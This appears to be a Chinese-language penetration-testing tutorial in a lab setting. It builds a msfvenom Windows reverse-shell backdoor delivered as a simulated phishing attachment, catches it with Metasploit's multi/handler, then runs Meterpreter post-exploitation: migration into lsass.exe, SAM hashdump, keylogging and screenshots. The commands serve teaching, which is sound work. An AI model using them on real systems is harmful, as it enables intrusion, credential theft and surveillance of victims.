昨天介紹了 Meterpreter 的指令列表,今天帶大家來實作。
我們測試的方法在攻擊主機產 msfvenom 的後門,因為目標主機為 Windows 因此指令為:msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=攻擊主機IP LPORT=攻擊主機監聽port -f exe -o ~/test.exe
並透過 Python3 構造一個簡單的 webserver,模擬情境為員工收到釣魚信件之後,下載惡意附件,並開啟該惡意檔案,由下圖可看到下載 test.exe。
透過 msfconsole 開啟 exploit/mult/handler,
msfconsole
:開啟 CLI 介面use exploit/multi/handler
使用監聽模組set payload windows/shell/reverse_tcp
:設定跟 msfvenom 所使用的 payload 一樣set LHOST 172.28.128.6
:設定攻擊主機IPset LPORT 4444
:設定攻擊主機 portexploit
:進行攻擊如上圖看到C:\User\vagrant\Desktop
表示成功進入主機,此時輸入 background
,將這次的連線移到背景執行。
可從指令sessions
查看目前正在背景執行的連線。
使用 session -u <id>
將指定的連線提升使用 Meterpreter,就可以使用 Meterpreter 的指令,透過 sessions
可以看到目前背景有兩個連線狀態。
透過 session -i <id>
可以進入指定的連線,進行操作。
系統資訊sysinfo
可以提供目標主機的資訊,如作業系統、登入使用者帳號、主機名稱。
取得使用者名稱getuid
要確認目前進入的使用者帳號,我們的目標取的最高使用者的權限。
查看目標硬碟與其他設備show_mount
可以看到目標主機連接的硬碟大小與其他如 CD/DVD 等資料,由下圖可看到掛載的C:\
查看目前空閒的時間idletime
可以看到目前使用者處於非活動狀態的總時間。
shell
進入指令模式,有時候沒有辦法執行 shell,因此要透別注意。
確認 processps
指定移動到特定的 processmigrate <id>
切換成管理員權限
找到 SYSTEM ,id 484 lsass.exe
使用管理者的權限,因此可以切換到這個 process。
migrate 484
切換權限,並且使用 hashdump
hashdump
可以取得 Windows SAM 資料庫的內容,需要管理者的權限。
搜尋密碼相關檔案
測試 keyloagger
pgrep notepag
keyscan_start
keyscan_dump
keyscan_stop
截圖screenshot